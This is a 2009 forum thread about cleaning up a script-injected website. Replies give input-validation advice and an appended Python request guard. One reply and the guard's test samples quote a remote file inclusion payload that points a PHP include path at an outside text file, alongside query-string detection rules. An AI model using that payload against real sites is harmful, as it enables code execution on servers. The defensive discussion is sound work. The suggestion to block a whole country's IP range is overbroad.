My website - a victim of JavaScript / HTML Script injection

Discussion in 'Programming' started by MyArtGallery, Sep 14, 2009.

  1. #1
    Hi

    I have just been informed by my hosting that one of my websites is a victim of JavaScript / HTML script injection. They also require me to look carefully into my whole coding, and I may see the injected code there.

    I searched all my .php and .html files but have no idea what this injection code should look like. How can I detect it? I downloaded the whole website onto my computer and I'm still looking at my files.

    I'm thinking of using the search tool I found on Windows (start menu). With this tool Windows can show me all the files that contain a "word" I previously input in the search. But I have no idea what to enter there in the search. What do I tell Windows to search for inside my website files? I tried "javascript" or "script"... but all the search results are legal scripting code, part of the scripts I use.
    Which is a common "word" used in coding a javascript/html injection? Maybe if I can tell Windows to look for that word, I may detect the injection in my files.

    Please help!!!

    Thanks.
     
    MyArtGallery, Sep 14, 2009 IP
  2. pneulameiro

    pneulameiro Peon

    Messages:
    440
    Likes Received:
    4
    Best Answers:
    0
    Trophy Points:
    0
    #2
    You have to look at your database. Injection in HTML forms has the purpose of inserting, corrupting or catching information from your database.
     
    pneulameiro, Sep 14, 2009 IP
  3. Corwin

    Corwin Well-Known Member

    Messages:
    2,438
    Likes Received:
    107
    Best Answers:
    0
    Trophy Points:
    195
    #3
    For the past five months, there has been a deluge of SQL injection attacks, mostly from China, and most exploiting PHP.

    My main website is written in ASP VBScript so it's funny when I trap these attacks using PHP on a website that doesn't use PHP!

    There's not a lot I can tell you without tipping off the hackers. But I'll tell you this: first, you need to learn how to set up a .htaccess file. And/or, every single server-side scripting file you have needs to FIRST call an include file that is an error-catching routine. Then, validate your input.

    I don't know how PHP handles this, but I'll tell you how I do this in ASP.

    1. VALIDATE NUMERIC INPUT AND TRAP
    I have some pages that are served up by
    /pagename.asp?pid=5

    In my ASP code, I do this:

    rem The following line assumes "pid" is a number
    IF Request("pid") > 0 THEN
    rem do something
    END IF


    Simple code, but if pid isn't an integer then the page will crash with a Status 500. I then call a Status 500 routine that logs and emails to me the user's IP address, user agent, HTTP_RAW headers, a bunch of diagnostic Session variables I set including the last SQL statement, etc. Examine these, look for patterns.

    2. VALIDATE YOUR QUERY STRINGS
    This is a common hack attack that I'll see on my query strings:
    latest.php?GLOBALS[mosConfig_absolute_path]=http://www.example.net/zboard/data/id1.txt??

    I get these attacks about 20x a day. BEFORE your code does ANYTHING, EXAMINE THE QUERY STRING for "http". For most applications there is absolutely no reason for an "http" to be in your query string unless it's been manually inserted there by some hacker. If your .htaccess or error-catching routine detects an "http" in your query string, stop serving that user pages and have your application ban his IP address (in ASP this is easy, it's more difficult in PHP).

    3. BLOCK CHINA's IP RANGE
    Admittedly, this isn't a very nice solution as you will block a lot of legitimate users. But it's a solution of last resort only if you don't have the experience to implement the first two.

    Let me know if this helps!
     
    Corwin, Sep 15, 2009 IP
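The three checks described in the post above (reject a non-numeric pid, refuse any query string carrying "http", and a last-resort network block), collected into one request guard as an added example. This is not code from the thread or from either poster's site; it is written in Python because the checks are language-independent, and the helper names (parse_pid, query_string_is_suspicious, client_is_blocked, record_incident, check_request), the INCIDENTS list standing in for the "log and email me" routine, and the blocked network (the 203.0.113.0/24 documentation range, a placeholder and not any real country's allocation) are all assumptions made here.

```python
"""Request guard modelled on the three checks in Corwin's post.

Example added here, not code from the thread. All function names, the
INCIDENTS list and the BLOCKED_NETWORKS entry are assumptions.
"""
import ipaddress
import logging
from urllib.parse import parse_qs

log = logging.getLogger("webapp.guard")

# Constructed block list. 203.0.113.0/24 is the TEST-NET-3 documentation
# range, used only as a placeholder for "a range you decided to block".
BLOCKED_NETWORKS = [ipaddress.ip_network("203.0.113.0/24")]

# In-memory stand-in for the "log it and email me" Status 500 routine.
INCIDENTS = []


def parse_pid(raw):
    """Return the page id as an int if it is a positive integer, else None.

    str.isdigit() rejects signs, spaces, decimals and trailing text, so a
    value like "5a" never reaches the database layer.
    """
    if raw is None or not raw.isdigit():
        return None
    pid = int(raw)
    return pid if pid > 0 else None


def query_string_is_suspicious(query_string):
    """The post's rule: an 'http' anywhere in the query string is a red flag,
    because ordinary page requests have no reason to carry a URL there."""
    return "http" in query_string.lower()


def client_is_blocked(client_ip):
    """Last-resort network block. A malformed address is treated as blocked."""
    try:
        addr = ipaddress.ip_address(client_ip)
    except ValueError:
        return True
    return any(addr in net for net in BLOCKED_NETWORKS)


def record_incident(reason, client_ip, user_agent, query_string):
    """Keep the diagnostics the post says to collect (IP, user agent, raw
    request data) so patterns can be examined later."""
    entry = {"reason": reason, "ip": client_ip, "ua": user_agent, "qs": query_string}
    INCIDENTS.append(entry)
    log.warning("rejected request: %s", entry)


def check_request(query_string, client_ip, user_agent=""):
    """Run the checks BEFORE any application code.

    Returns (verdict, detail): verdict is 'serve' or 'reject'; detail is the
    rejection reason, or the parsed pid (None if absent) when serving.
    """
    if query_string_is_suspicious(query_string):
        record_incident("http in query string", client_ip, user_agent, query_string)
        return ("reject", "http in query string")
    if client_is_blocked(client_ip):
        record_incident("blocked network", client_ip, user_agent, query_string)
        return ("reject", "blocked network")
    params = parse_qs(query_string, keep_blank_values=True)
    pid = None
    if "pid" in params:
        pid = parse_pid(params["pid"][0])
        if pid is None:
            record_incident("pid is not a positive integer", client_ip, user_agent, query_string)
            return ("reject", "pid is not a positive integer")
    return ("serve", pid)


if __name__ == "__main__":
    # Constructed sample requests; 198.51.100.7 is a documentation address.
    samples = [
        ("pid=5", "198.51.100.7"),
        ("pid=abc", "198.51.100.7"),
        ("GLOBALS[mosConfig_absolute_path]=http://www.example.net/zboard/data/id1.txt??", "198.51.100.7"),
        ("pid=5", "203.0.113.9"),
    ]
    for qs, ip in samples:
        print(qs, ip, "->", check_request(qs, ip, "constructed-agent/1.0"))
```

The "http" test runs first because it is the cheapest and, as the post says, should happen before the application does anything; the pid check only fires when a pid parameter is actually present, so pages that do not take one are unaffected.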